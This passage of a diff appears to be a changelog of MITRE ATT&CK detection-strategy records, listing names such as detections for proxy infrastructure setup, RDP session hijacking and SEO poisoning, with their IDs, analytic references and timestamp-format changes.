+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--865c00d7-fc01-4ce6-8fc8-d7a84f2ded36",
+                        "x-mitre-analytic--273d7b27-6b7d-4017-a7f6-0cd02fd3a128",
+                        "x-mitre-analytic--3e461dab-922c-48cc-aafc-51f20025bf27"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5c44619a-da36-4bbd-9730-efceacf2409f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0445",
+                            "external_id": "DET0445"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Proxy Infrastructure Setup and Traffic Bridging",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0e9add05-93bd-47b2-acf5-1817f03e804a",
+                        "x-mitre-analytic--b95a3fbf-3d6c-4ead-8421-ff9c07ca4019",
+                        "x-mitre-analytic--aace8c0e-4534-432b-9a84-6e01c19570b7",
+                        "x-mitre-analytic--d8cc8663-020b-4fde-a8de-a92ecf97aea4",
+                        "x-mitre-analytic--a79ae1d1-1a8d-427d-aa6d-261ea63d5650"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4d41c48b-ef2a-49a1-baaa-039625612c20",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0880",
+                            "external_id": "DET0880"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Purchase Technical Data",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--40c8a3ac-4fe9-49c3-a9bd-f8f684d42003"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e2c3189b-34cf-4160-bc9f-2dcf4df451c6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 14:59:37.388000+00:00",
+                    "modified": "2026-05-12 16:30:18.391000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0919",
+                            "external_id": "DET0919"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Query Public AI Services",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--255379f1-e115-4f3c-835a-23c8d279847e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-23 14:59:37.388000+00:00\", \"old_value\": \"2026-04-23T14:59:37.388Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.391000+00:00\", \"old_value\": \"2026-04-24T20:23:56.287Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--106e32a9-29b7-4ec7-80cf-768662706490",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0209",
+                            "external_id": "DET0209"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Registry Query for Environmental Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8986f2ab-2e6d-4c68-99ac-6a1c5f29fb7b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--20f11806-1639-49c5-ae0b-84633a142870",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0071",
+                            "external_id": "DET0071"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Remote Data Staging Prior to Exfiltration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7efd6a7b-d7c0-4922-a1df-c492c0a2d3f8",
+                        "x-mitre-analytic--14ac0f26-e5db-42da-b730-9e115027f8e9",
+                        "x-mitre-analytic--2891bd53-5a81-4330-bb05-ffd731868d06",
+                        "x-mitre-analytic--0e2094fe-6912-4bde-9e5a-9d95c640646a",
+                        "x-mitre-analytic--696b98e8-10fd-4c7a-bb80-302baca34e60"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5d244477-26e2-4b3a-b882-fd74e366e07d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0079",
+                            "external_id": "DET0079"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Remote Service Session Hijacking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3c320df0-2a99-4bc4-b0f4-7af1675ccdb9",
+                        "x-mitre-analytic--fba8a3f5-74d0-47d2-a688-1bdcc99dae6b",
+                        "x-mitre-analytic--81889314-3404-4cfb-a650-52a5898b6f31"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2729a43c-3f8d-4fee-b2bd-f773436d051b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0588",
+                            "external_id": "DET0588"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Remote Service Session Hijacking for RDP.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--be773ad4-9e5f-4063-910a-99a3cab90582"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:26:25.154Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3d06c5c3-ace1-4eff-98cd-2ddc95474f66",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0881",
+                            "external_id": "DET0881"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of SEO Poisoning",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--86a212ef-8e7b-4c51-9e7f-492da2283294"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fa1f7635-b4a2-4a2b-87ae-50cb4dbee328",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0858",
+                            "external_id": "DET0858"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Scan Databases",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--db6010df-737d-4fa1-89af-dce6c4c3c305"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ca916010-7f72-4132-ad7c-44967d479dcc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0817",
+                            "external_id": "DET0817"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Scanning IP Blocks",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4ba33f5f-5f75-40c5-96ab-b014e772f9a8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8ac2b0d0-a589-4c72-9287-a7d9e47065a9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0466",
+                            "external_id": "DET0466"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Script-Based Proxy Execution via Signed Microsoft Utilities",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--84e969fd-a0ee-425f-a7dd-ae10e170d45a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3f4c871c-9ddb-41da-accd-ff5bcbfe37d4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0822",
+                            "external_id": "DET0822"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Search Closed Sources",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9d36e6e7-9c6c-495c-9431-464fb525c4e8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cf1329da-a87c-42bb-8950-58fcf36b9b9b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0811",
+                            "external_id": "DET0811"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Search Engines",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--746ebd79-2d1f-4e58-8bdb-b49a236a9642"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dc9fa05f-7e98-41ef-9d40-21fd1425f5d5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0860",
+                            "external_id": "DET0860"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Search Open Technical Databases",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3ee2fdaa-358a-4f65-9d15-c9096628bc7e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3ada68d4-a4ab-4c06-98ce-33aaef54a115",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0856",
+                            "external_id": "DET0856"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Search Open Websites/Domains",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c752faa1-9cc2-421a-b646-0efe4da990c9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6b173b90-4b1d-4de8-a506-95b8b10921a7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0866",
+                            "external_id": "DET0866"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Search Threat Vendor Data",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ac4bf64e-da14-4416-8961-f0736eb4d9be"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--52cee5e7-a92e-433e-9b56-38c8f7b16264",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0810",
+                            "external_id": "DET0810"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Search Victim-Owned Websites",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5c5afe0d-b967-49ac-8c3e-eeb9cc01667d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7c1262bb-c0d1-4e0c-bab8-a232f7bed9d5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-23 17:50:38.555000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
